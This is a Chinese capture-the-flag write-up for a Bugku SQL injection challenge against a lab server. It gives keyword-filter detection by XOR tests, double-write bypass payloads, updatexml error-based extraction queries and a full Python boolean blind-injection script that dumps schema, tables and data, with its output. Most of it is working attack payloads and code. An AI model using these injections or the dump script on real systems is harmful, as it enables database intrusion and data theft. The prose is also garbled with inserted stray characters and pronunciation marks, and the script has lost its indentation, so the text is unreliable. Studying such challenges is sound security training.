多次
原題鏈接
http://120.24.86.145:9004
分析
- 單引號(hào)出錯(cuò)
- 加上%23,發(fā)現(xiàn)不出錯(cuò)了
- 加上
' and 1=1%23
又出錯(cuò)了贬养,應(yīng)該是過(guò)濾了
這里學(xué)習(xí)到一個(gè)新知識(shí)昼捍,如何判斷過(guò)濾了哪些字符识虚?
采用異或注入。
在id=1后面輸入 '(0)'
發(fā)現(xiàn)不出錯(cuò)妒茬,那就將0換成1=1
如果出錯(cuò)担锤,那就是成功了
如果括號(hào)里面的判斷是假的,那么頁(yè)面就會(huì)顯示正確
那么同理乍钻,
如果我修改里面的內(nèi)容為length(‘union’)!=0
如果頁(yè)面顯示正確肛循,那就證明length(‘union’)==0的,也就是union被過(guò)濾了
同樣道理银择,測(cè)試出過(guò)濾字符 select,union,and,or
可以采用雙寫繞過(guò)多糠。測(cè)試payload:
http://120.24.86.145:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23
頁(yè)面結(jié)果
2
database:
?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23
web1002-1
tables:
注意information里面有or,要雙寫過(guò)濾
?id=-1' ununionion seselectlect 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() #
頁(yè)面結(jié)果
flag1,hint
columns:
?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23
頁(yè)面結(jié)果
flag1,address
dump:
?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23
頁(yè)面結(jié)果
usOwycTju+FTUUzXosjr
?id=-1' ununionion seselectlect 1, group_concat(address) from flag1 %23
頁(yè)面結(jié)果
./Once_More.php
下一關(guān)地址
進(jìn)入鏈接
測(cè)試?id=1'
報(bào)錯(cuò)
My Id =1'
Nobody!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
我還是一樣的辦法測(cè)試過(guò)濾
union substr sleep
雙寫無(wú)法繞過(guò)浩考,大小寫無(wú)法繞過(guò)夹孔,/*!*/無(wú)法繞過(guò)析孽。
更換函數(shù)搭伤,利用updatexml報(bào)錯(cuò)。
payload
# 查表
http://120.24.86.145:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# 結(jié)果
Nobody!
XPATH syntax error: '~class,flag2~'
# 查字段
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# 結(jié)果
Nobody!
XPATH syntax error: '~flag2,address~'
# 查數(shù)據(jù)
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# 結(jié)果
Nobody!
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'
本題也可以用布爾盲注來(lái)做袜瞬,畢竟有回顯和明顯的TF標(biāo)志怜俐,因?yàn)榕銮梢苍趯W(xué)習(xí)盲注,做了一下吞滞,這里附上腳本:
import requests
def length_schema():
for x in range(1,20):
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20length(database())='+str(x)+'%23'
s = requests.get(url)
if "Hello" in s.text:
print 'schema_length is :' + str(x)
global a
a = int(x)
break
def schema_name():
x = 0
name = ''
while x < a:
x = x + 1
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
for i in temp:
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20mid(database(),'+ str(x) +',1)=%27'+str(i)+'%27%23'
s = requests.get(url)
if "Hello" in s.text:
name = name + str(i)
print 'sechma_name is :' + name
global schema_name
schema_name = name
def all():
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for x in xrange(0,20):
table_name = ''
for y in xrange(1,20):
key = 0
for i in temp:
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'+schema_name+'%27%20limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url)
if "Hello" in s.text:
key = 1
table_name = table_name + str(i)
if key == 0:
break
if table_name == '':
break
print 'one of tables is:' + table_name
for p in xrange(0,20):
column_name = ''
for q in xrange(1,20):
key = 0
for i in temp:
url_columns = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'+schema_name+'%27%20and%20table_name=%27'+table_name+'%27limit%20'+str(p)+',1),'+str(q)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url_columns)
if "Hello" in s.text:
key = 1
column_name = column_name + str(i)
if key ==0:
break
if column_name == '':
break
print 'a column name of '+table_name+' is '+column_name
for y in xrange(0,10):
data = ''
for z in xrange(1,20):
key = 0
for i in temp_data:
url_data = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20'+column_name+'%20from%20`'+schema_name+'`.'+table_name+'%20limit%20'+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url_data)
if "Hello" in s.text:
data = data + str(i)
key = 1
if key == 0:
break
if data == '':
break
print 'one data of '+schema_name+'.'+table_name+'\'s '+column_name+' is '+data
def main():
length_schema()
schema_name()
all()
if __name__ == '__main__':
main()
結(jié)果
schema_length is :9
sechma_name is :web1002-2
one of tables is:class
a column name of class is id
one data of web1002-2.class's id is 1
one data of web1002-2.class's id is 2
one data of web1002-2.class's id is 3
one data of web1002-2.class's id is 4
one data of web1002-2.class's id is 5
one data of web1002-2.class's id is 6
one data of web1002-2.class's id is 7
a column name of class is name
one data of web1002-2.class's name is TOM
one data of web1002-2.class's name is Jack
one data of web1002-2.class's name is Mack
one data of web1002-2.class's name is Jones
one data of web1002-2.class's name is James
one data of web1002-2.class's name is Fox
one data of web1002-2.class's name is Henry
one of tables is:flag2
a column name of flag2 is flag2
one data of web1002-2.flag2's flag2 is flag{Bugku-sql_6s-2
a column name of flag2 is address
one data of web1002-2.flag2's address is .
[Finished in 1620.8s]
flag
flag{bugku-sql_6s-2i-4t-bug}
知識(shí)點(diǎn)
報(bào)錯(cuò)注入佑菩,基本的過(guò)濾和繞過(guò),布爾盲注
